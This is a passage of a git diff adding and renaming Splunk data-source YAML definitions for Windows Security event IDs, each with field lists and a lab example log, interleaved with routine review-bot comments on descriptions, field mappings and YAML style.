+- object_attrs
+- object_category
+- product
+- punct
+- service
+- service_name
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: 11000410300x4020000000000000140874Securityar-win-2
diff --git a/data_sources/windows_event_log_security_1102.yml b/data_sources/windows_event_log_security_1102.yml
new file mode 100644
index 0000000000..c2164817b4
--- /dev/null
+++ b/data_sources/windows_event_log_security_1102.yml
@@ -0,0 +1,85 @@
+name: Windows Event Log Security 1102
+id: 8db7b91a-6d7a-40e7-bfac-06f8e901a9cb
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 1102
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- LogFileCleared_Xml
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- UserData_Xml
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object_attrs
+- object_category
+- product
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: 11020410400x40200000000000001826166Securityar-win-dc.attackrange.localATTACKRANGE\AdministratorAdministratorATTACKRANGE0x34a3a27
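Review bot: `description: Data source object for Windows Event Log Security 1102` only repeats the `name` value and tells a reader choosing a data source for a detection nothing about the event; it should state what the event records, e.g. `description: Windows Security event 1102, logged when the Security audit log is cleared.`. The same templated description is used in every new and renamed file in this commit (1100, 4624, 4625, 4627, 4648, 4662, 4663, 4672, 4688, 4703, 4719 and the renamed Defender, PrintService and Security files); each should get a one-line statement of the event's meaning. Where the meaning is not known for certain, the line should say so rather than restate the name.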
diff --git a/data_sources/windows_event_log_security_4624.yml b/data_sources/windows_event_log_security_4624.yml
new file mode 100644
index 0000000000..0864fb4d62
--- /dev/null
+++ b/data_sources/windows_event_log_security_4624.yml
@@ -0,0 +1,135 @@
+name: Windows Event Log Security 4624
+id: 08682968-0366-4882-9559-fe4fe018a846
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4624
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- AuthenticationPackageName
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- ElevatedToken
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- ImpersonationLevel
+- IpAddress
+- IpPort
+- KeyLength
+- Keywords
+- Level
+- LmPackageName
+- LogonGuid
+- LogonProcessName
+- LogonType
+- Logon_ID
+- Logon_Type
+- Name
+- Opcode
+- ProcessID
+- ProcessId
+- ProcessName
+- RecordNumber
+- RestrictedAdminMode
+- Source_Port
+- Source_Workstation
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetLinkedLogonId
+- TargetLogonId
+- TargetOutboundDomainName
+- TargetOutboundUserName
+- TargetUserName
+- TargetUserSid
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- TransmittedServices
+- Version
+- VirtualAccount
+- WorkstationName
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- process
+- process_id
+- process_name
+- process_path
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_ip
+- src_port
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::app
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: 4624201254400x8020000000000000371886Securityar-win-7.attackrange.localNULL SID--0x0ATTACKRANGE\ELMER_SALASELMER_SALASATTACKRANGE.LOCAL0x693ef43KerberosKerberos-{139F7D70-0163-38CC-676D-00AE04A0F19C}--00x0-10.0.1.1649980%%1833---%%18430x0%%1843
diff --git a/data_sources/windows_event_log_security_4625.yml b/data_sources/windows_event_log_security_4625.yml
new file mode 100644
index 0000000000..7824f0dfee
--- /dev/null
+++ b/data_sources/windows_event_log_security_4625.yml
@@ -0,0 +1,127 @@
+name: Windows Event Log Security 4625
+id: 365a02c2-7d18-4baf-b76e-d90c20bbe6ed
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4625
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- AuthenticationPackageName
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- FailureReason
+- Guid
+- IpAddress
+- IpPort
+- KeyLength
+- Keywords
+- Level
+- LmPackageName
+- LogonProcessName
+- LogonType
+- Logon_ID
+- Logon_Type
+- Name
+- Opcode
+- ProcessID
+- ProcessId
+- ProcessName
+- RecordNumber
+- Source_Port
+- Source_Workstation
+- Status
+- SubStatus
+- Sub_Status
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetUserName
+- TargetUserSid
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- TransmittedServices
+- Version
+- WorkstationName
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- process
+- process_id
+- process_name
+- process_path
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_ip
+- src_port
+- status
+- subject
+- ta_windows_action
+- ta_windows_status
+- tag
+- tag::action
+- tag::app
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: 4625001254400x8010000000000000367348Securityar-win-8.attackrange.localNULL SID--0x0NULL
+ SIDAdministratorbuiltin0xc000006d%%23130xc000006a3NtLmSsp NTLM---00x0-10.0.1.3059450
diff --git a/data_sources/windows_event_log_security_4627.yml b/data_sources/windows_event_log_security_4627.yml
new file mode 100644
index 0000000000..0682bbbc29
--- /dev/null
+++ b/data_sources/windows_event_log_security_4627.yml
@@ -0,0 +1,102 @@
+name: Windows Event Log Security 4627
+id: e35c7b9a-b451-4084-95a5-43b7f8965cac
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4627
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventCountTotal
+- EventData_Xml
+- EventID
+- EventIdx
+- EventRecordID
+- GroupMembership
+- Guid
+- Keywords
+- Level
+- LogonType
+- Logon_ID
+- Logon_Type
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetLogonId
+- TargetUserName
+- TargetUserSid
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- product
+- punct
+- session_id
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- status
+- ta_windows_action
+- tag
+- tag::action
+- tag::app
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: 4627001255400x8020000000000000186260Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-21-2442966654-584408786-1775486684-1115lowprivATTACKRANGE.LOCAL0x1094dbc311
diff --git a/data_sources/windows_event_log_security_4648.yml b/data_sources/windows_event_log_security_4648.yml
new file mode 100644
index 0000000000..a5840b93d3
--- /dev/null
+++ b/data_sources/windows_event_log_security_4648.yml
@@ -0,0 +1,118 @@
+name: Windows Event Log Security 4648
+id: 6a367f8b-1ee0-463d-94a7-029757c6cd02
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4648
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- IpAddress
+- IpPort
+- Keywords
+- Level
+- LogonGuid
+- Logon_ID
+- Name
+- Opcode
+- ProcessID
+- ProcessId
+- RecordNumber
+- Source_Port
+- Source_Workstation
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetInfo
+- TargetLogonGuid
+- TargetServerName
+- TargetUserName
+- Target_Domain
+- Target_Server_Name
+- Target_User_Name
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dest_nt_host
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- process_id
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_nt_domain
+- src_nt_host
+- src_port
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::app
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: 4648001254400x8020000000000000336567Securitywin-host-mvelazco-02713-447.attackrange.localATTACKRANGE\REED_LARSENreed_larsenATTACKRANGE0x1360f2{00000000-0000-0000-0000-000000000000}STEVE_BRADFORDattackrange.local{00000000-0000-0000-0000-000000000000}win-dc-mvelazco-02713-392.attackrange.localwin-dc-mvelazco-02713-392.attackrange.local0x410.0.1.14445
diff --git a/data_sources/windows_event_log_security_4662.yml b/data_sources/windows_event_log_security_4662.yml
new file mode 100644
index 0000000000..004e36888c
--- /dev/null
+++ b/data_sources/windows_event_log_security_4662.yml
@@ -0,0 +1,103 @@
+name: Windows Event Log Security 4662
+id: f3c2cd64-0b5f-4013-8201-35dc03828ec6
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4662
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- AccessList
+- AccessMask
+- ActivityID
+- AdditionalInfo
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- HandleId
+- Keywords
+- Level
+- Logon_ID
+- Name
+- ObjectName
+- ObjectServer
+- ObjectType
+- Opcode
+- OperationType
+- ProcessID
+- Properties
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object_file_name
+- object_file_path
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: 4662001408000x801000000000000021623198276Securityattack_range_dcattack_range\attackerattackerattack_range0x632426dc0DSgroupCN=Incoming
+ Forest Trust Builders,CN=Users,DC=Attack_RangeObject
+ Access0x0%%7688
diff --git a/data_sources/windows_event_log_security_4663.yml b/data_sources/windows_event_log_security_4663.yml
new file mode 100644
index 0000000000..44fa5cf912
--- /dev/null
+++ b/data_sources/windows_event_log_security_4663.yml
@@ -0,0 +1,107 @@
+name: Windows Event Log Security 4663
+id: 5d6dca8c-dad9-494f-a321-ef2b0b92fbf4
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4663
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- AccessList
+- AccessMask
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- HandleId
+- Keywords
+- Level
+- Logon_ID
+- Name
+- ObjectName
+- ObjectServer
+- ObjectType
+- Opcode
+- ProcessID
+- ProcessId
+- ProcessName
+- RecordNumber
+- ResourceAttributes
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- file_name
+- file_path
+- host
+- id
+- index
+- linecount
+- name
+- object_file_name
+- object_file_path
+- process
+- process_id
+- process_name
+- process_path
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: 4663101280000x802000000000000010525869Securityar-win-2.attackrange.localAR-WIN-2\AdministratorAdministratorAR-WIN-20x6cfe7SecurityFileC:\Program
+ Files (x86)\ScreenConnect\App_Extensions\evilapp - Copy (2).aspx0x2220%%4424
diff --git a/data_sources/windows_event_log_security_4672.yml b/data_sources/windows_event_log_security_4672.yml
new file mode 100644
index 0000000000..2a3942729b
--- /dev/null
+++ b/data_sources/windows_event_log_security_4672.yml
@@ -0,0 +1,91 @@
+name: Windows Event Log Security 4672
+id: 43f189b6-369d-4a32-a34c-57e0d38d92f1
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4672
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- PrivilegeList
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: 4672001254800x8020000000000000148946Securityar-win-6.attackrange.localATTACKRANGE\REED_MORSEREED_MORSEATTACKRANGE0x509b11SeSecurityPrivilege
diff --git a/data_sources/windows_event_log_security_4688.yml b/data_sources/windows_event_log_security_4688.yml
new file mode 100644
index 0000000000..bb84aab318
--- /dev/null
+++ b/data_sources/windows_event_log_security_4688.yml
@@ -0,0 +1,137 @@
+name: Windows Event Log Security 4688
+id: d195eb26-a81c-45ed-aeb3-25792e8a985a
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4688
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- CommandLine
+- Computer
+- Error_Code
+- EventCode
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- MandatoryLabel
+- Name
+- NewProcessId
+- NewProcessName
+- Opcode
+- ParentProcessName
+- ProcessID
+- Process_Command_Line
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- TargetDomainName
+- TargetLogonId
+- TargetUserName
+- TargetUserSid
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- TokenElevationType
+- Token_Elevation_Type
+- Token_Elevation_Type_id
+- Version
+- action
+- app
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- id
+- name
+- new_process
+- new_process_id
+- new_process_name
+- parent_process
+- parent_process_id
+- parent_process_name
+- parent_process_path
+- process
+- process_command_line_arguments
+- process_command_line_process
+- process_exec
+- process_id
+- process_name
+- process_path
+- product
+- session_id
+- signature
+- signature_id
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- user
+- user_group
+- vendor
+- vendor_product
+field_mappings:
+ - data_model: cim
+ data_set: Endpoint.Processes
+ mapping:
+ NewProcessId: Processes.process_id
+ NewProcessName: Processes.process_path
+ NewProcessName|endswith: Processes.process_name
+ Process_Command_Line: Processes.process
+ SubjectUserSid: Processes.user
+ ProcessId: Processes.parent_process_id
+ ParentProcessName: Processes.parent_process_path
+ ParentProcessName|endswith: Processes.parent_process_name
+ Computer: Processes.dest
+ - data_model: ocsf
+ mapping:
+ NewProcessId: process.pid
+ NewProcessName: process.file.path
+ NewProcessName|endswith: process.file.name
+ Process_Command_Line: process.cmd_line
+ SubjectUserSid: actor.user.name
+ ProcessId: actor.process.pid
+ ParentProcessName: actor.process.file.path
+ ParentProcessName|endswith: actor.process.file.name
+ Computer: device.hostname
+convert_to_log_source:
+ - data_source: Sysmon Event ID 1
+ mapping:
+ NewProcessId: ProcessId #New_Process_ID in Hex
+ NewProcessName: Image
+ Process_Command_Line: CommandLine
+ SubjectUserSid: User
+ ProcessId: ParentProcessId
+ ParentProcessName: ParentImage
+ Computer: Computer
+example_log: 4688201331200x8020000000000000432820Securityar-win-1NT AUTHORITY\SYSTEMAR-WIN-1$WORKGROUP0x3e70xf84C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe%%19360xb2c"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
+ --ps2NULL SID--0x0C:\Program
+ Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory
+ Label\System Mandatory Level
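Review bot: In both mapping blocks `SubjectUserSid` is mapped to a user-name field (`Processes.user` in the CIM block, `actor.user.name` in the OCSF block), although the SID is an identifier and the account name is carried by `SubjectUserName`, which the `fields` list above does include; the OCSF mapping this same commit removes from the 4720 file used `SubjectUserName: actor.user.name` together with `SubjectUserSid: actor.user.uid`, so this file should follow that convention unless the SID-as-name mapping is deliberate — `SubjectUserName: actor.user.name` plus `SubjectUserSid: actor.user.uid` on the OCSF side, and `SubjectUserName: Processes.user` on the CIM side, if `Processes.user` is meant to hold the account name. Two smaller points in the same hunk: the inline comment `NewProcessId: ProcessId #New_Process_ID in Hex` should be `NewProcessId: ProcessId  # New_Process_ID, in hex` (two spaces before `#`, one after), and `field_mappings` and `convert_to_log_source` indent their sequences while `fields` does not, which yamllint's indent-sequences check flags. The `fields` list here also omits `_time`, `host`, `index`, `source`, `sourcetype`, `splunk_server` and the `date_*` fields that every other new file in this commit lists — presumably generated from a different sample, but worth confirming it was not truncated.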
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4698.yml b/data_sources/windows_event_log_security_4698.yml
similarity index 69%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_Security_4698.yml
rename to data_sources/windows_event_log_security_4698.yml
index 96adc194c3..4da1f09347 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4698.yml
+++ b/data_sources/windows_event_log_security_4698.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log Security 4698
+name: Windows Event Log Security 4698
+id: 32c06703-02d3-47ec-8856-b0dc3045866c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4698
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
fields:
- _time
- Account_Domain
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4699.yml b/data_sources/windows_event_log_security_4699.yml
similarity index 69%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_Security_4699.yml
rename to data_sources/windows_event_log_security_4699.yml
index d160b5ef93..46eb5e7e31 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4699.yml
+++ b/data_sources/windows_event_log_security_4699.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log Security 4699
+name: Windows Event Log Security 4699
+id: 4727dead-d063-4333-9ddd-59823a416aff
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4699
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
fields:
- _time
- Account_Domain
diff --git a/data_sources/windows_event_log_security_4703.yml b/data_sources/windows_event_log_security_4703.yml
new file mode 100644
index 0000000000..b1c75815b6
--- /dev/null
+++ b/data_sources/windows_event_log_security_4703.yml
@@ -0,0 +1,112 @@
+name: Windows Event Log Security 4703
+id: e256673b-16e8-4b74-b7aa-9eed6ce67072
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4703
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Caller_Domain
+- Caller_User_Name
+- Channel
+- Computer
+- DisabledPrivilegeList
+- EnabledPrivilegeList
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- ProcessID
+- ProcessId
+- ProcessName
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetLogonId
+- TargetUserName
+- TargetUserSid
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- object_id
+- process
+- process_id
+- process_name
+- process_path
+- product
+- punct
+- result
+- session_id
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- src_user_name
+- status
+- ta_windows_action
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- user_name
+- vendor
+- vendor_product
+example_log: 4703001331700x8020000000000000328761Securitywin-host-ctus-attack-range-115WIN-HOST-CTUS-A\AdministratorAdministratorWIN-HOST-CTUS-A0x288b91WIN-HOST-CTUS-A\AdministratorAdministratorWIN-HOST-CTUS-A0x288b91C:\Temp\poc_2\c2_agent.exe0x570SeDebugPrivilege-
diff --git a/data_sources/windows_event_log_security_4719.yml b/data_sources/windows_event_log_security_4719.yml
new file mode 100644
index 0000000000..f2fce95f77
--- /dev/null
+++ b/data_sources/windows_event_log_security_4719.yml
@@ -0,0 +1,98 @@
+name: Windows Event Log Security 4719
+id: 954033e6-dd05-4775-a1f2-1f19632f4420
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4719
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- AuditPolicyChanges
+- Caller_Domain
+- Caller_User_Name
+- CategoryId
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SubcategoryGuid
+- SubcategoryId
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object_attrs
+- object_category
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: 4719001356800x8020000000000000353597Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e7%%8276%%13312{0CCE922B-69AE-11D9-BED3-505054503030}%%8448, %%8450
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4720.yml b/data_sources/windows_event_log_security_4720.yml
similarity index 76%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_Security_4720.yml
rename to data_sources/windows_event_log_security_4720.yml
index f593ca0b1c..c66b7a7ab9 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4720.yml
+++ b/data_sources/windows_event_log_security_4720.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log Security 4720
+name: Windows Event Log Security 4720
+id: 7ef1c9e5-691b-48c2-811b-eba91d2d2f1d
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4720
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
fields:
- _time
- Account_Domain
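Review bot: `sourcetype: xmlwineventlog` in the new header is lower-cased while `source: XmlWinEventLog:Security` one line above keeps the add-on's mixed-case name; Splunk search itself generally matches field values case-insensitively, but any contentctl validation or generated documentation that compares these strings literally would treat the two spellings as different sourcetypes. Writing it as `sourcetype: XmlWinEventLog` keeps the object consistent with its own `source` value. The same lower-case spelling appears in every other data_sources header in this diff (the 4732 rename and the new 4724 through 4887 files), so the change should be made in one pass. While touching these headers, `version: 8.8.0` under `supported_TA` is read as a string only because it has two dots; quoting it as `version: '8.8.0'` keeps a future single-dot release from being parsed as a float.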
@@ -95,15 +107,4 @@ fields:
- user_group_id
- vendor
- vendor_product
-field_mappings:
- - data_model: ocsf
- mapping:
- SubjectDomainName: actor.user.domain
- SubjectUserName: actor.user.name
- SubjectLogonId: actor.session.uid
- SubjectUserSid: actor.user.uid
- TargetDomainName: user.domain
- TargetUserName: user.name
- UserPrincipalName: user.email_addr
